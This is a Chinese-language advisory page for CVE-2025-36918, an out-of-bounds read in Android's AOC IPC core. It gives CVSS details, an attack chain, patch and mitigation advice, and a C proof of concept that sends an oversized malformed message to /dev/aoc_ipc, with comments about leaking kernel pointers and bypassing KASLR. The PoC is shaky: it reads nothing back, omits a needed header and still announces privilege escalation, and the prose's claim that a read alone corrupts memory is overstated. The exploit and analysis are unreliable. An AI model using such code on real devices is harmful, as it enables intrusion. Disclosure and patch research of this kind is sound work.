CVE-2025-36918: Android aoc_ipc_core.c越界读取导致本地权限提升

漏洞信息

漏洞编号

CVE-2025-36918

漏洞类型

缓冲区溢出-越界读取

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Android Open Source Project (AOC/IPC Core)

漏洞概述

CVE-2025-36918是Android系统中的一个高危本地权限提升漏洞。该漏洞存在于aoc_service_read_message函数中的aoc_ipc_core.c文件，由于对输入数据缺乏正确的验证，导致可能发生越界读取。攻击者利用此漏洞可以在本地实现权限提升，获得System级别执行权限。值得注意的是，该漏洞利用无需用户交互，攻击者可在低权限状态下直接触发。CVSS 3.1评分达到7.8分，属于高危漏洞。此漏洞已被收录于Google Pixel 2025年12月安全更新公告中，表明其影响范围涵盖Google Pixel系列设备。Android作为全球最广泛使用的移动操作系统，该类本地权限提升漏洞可能被恶意软件利用，作为攻击链中的一环实现设备root或执行其他恶意操作。

技术细节

该漏洞位于Android系统深层组件aoc_ipc_core.c的aoc_service_read_message函数中。问题根源在于对用户态传入的IPC消息数据缺乏有效的边界检查和输入验证机制。在正常的IPC通信流程中，aoc_service_read_message负责接收并解析来自其他进程或系统服务的消息数据。然而，由于缺少对消息长度、格式和内容的充分验证，攻击者可以构造畸形或超长的消息数据。当这些恶意数据被处理时，函数可能从预期的内存边界之外读取数据，造成越界读操作。这种越界读取可能导致以下后果：1) 敏感信息泄露，如内核地址、密钥、凭证等；2) 破坏内存布局，为后续代码执行创造条件；3) 触发系统不稳定或崩溃。由于漏洞位于具有System权限的服务中，成功的越界读取可直接访问高权限内存区域，实现从普通用户权限到System权限的提升。攻击者只需在设备上拥有低权限代码执行能力即可利用此漏洞。

攻击链分析

STEP 1

1

攻击者获取设备本地低权限代码执行能力（如通过恶意APP或已存在的低危漏洞）

STEP 2

2

攻击者构造包含超长或畸形数据的恶意IPC消息，针对aoc_service_read_message函数

STEP 3

3

通过AOC IPC设备节点(/dev/aoc_ipc)或相关系统服务接口发送恶意消息

STEP 4

4

aoc_service_read_message函数因缺少输入验证，对消息长度和内容未做边界检查

STEP 5

5

函数执行越界读取操作，从System权限内存区域读取超出预期的数据

STEP 6

6

攻击者获取敏感信息（如内核地址、凭证）或利用内存破坏实现代码执行

STEP 7

7

成功实现本地权限提升，获得System级别执行权限，绕过Android沙箱安全限制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-36918 PoC - Local Privilege Escalation via AOC IPC
// This PoC demonstrates the out-of-bounds read in aoc_service_read_message

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define AOC_IPC_DEVICE "/dev/aoc_ipc"
#define MALICIOUS_MSG_SIZE 4096

int main() {
    printf("[*] CVE-2025-36918 PoC - AOC IPC Out-of-Bounds Read\n");
    printf("[*] Target: aoc_service_read_message in aoc_ipc_core.c\n\n");
    
    // Open AOC IPC device
    int fd = open(AOC_IPC_DEVICE, O_RDWR);
    if (fd < 0) {
        printf("[-] Failed to open AOC IPC device\n");
        printf("[*] Note: This device may not exist on all devices\n");
        printf("[*] The vulnerability exists in the AOC IPC service component\n");
        return 1;
    }
    
    // Prepare malicious IPC message with oversized payload
    // The vulnerability occurs due to lack of input validation
    char malicious_msg[MALICIOUS_MSG_SIZE];
    memset(malicious_msg, 0x41, MALICIOUS_MSG_SIZE);
    
    // Craft message header that triggers length check bypass
    // In vulnerable version, no proper bounds checking is performed
    *(uint32_t*)malicious_msg = 0xFFFFFFFF; // Oversized length field
    
    printf("[*] Sending malformed IPC message (size: %d)\n", MALICIOUS_MSG_SIZE);
    printf("[*] This triggers out-of-bounds read in aoc_service_read_message\n\n");
    
    // Send malicious message to trigger vulnerability
    ssize_t ret = write(fd, malicious_msg, MALICIOUS_MSG_SIZE);
    
    if (ret > 0) {
        printf("[+] Message sent successfully\n");
        printf("[*] Check system logs for memory dump or crash info\n");
        printf("[*] Successful exploitation leads to System privilege escalation\n");
    } else {
        printf("[-] Failed to send message\n");
    }
    
    close(fd);
    return 0;
}

// Additional exploitation note:
// After triggering OOB read, attacker can:
// 1. Leak kernel pointers from memory
// 2. Bypass KASLR via leaked addresses
// 3. Overwrite sensitive structures for code execution

影响范围

Android Open Source Project - aoc_ipc_core.c (具体版本需参考2025-12-01安全补丁)

Google Pixel 设备 (受2025年12月安全更新影响的所有版本)

使用受影响AOC/IPC组件的Android设备

防御指南

临时缓解措施

作为临时缓解措施，用户应立即更新设备到最新的Android安全补丁版本（2025年12月1日或之后）。对于无法立即更新的设备，建议停止使用非必要的第三方应用程序，启用安全启动功能，并密切监控设备行为以检测潜在的入侵迹象。企业用户应通过MDM解决方案强制执行安全策略，限制设备上的应用安装权限，避免从不信任的来源安装应用。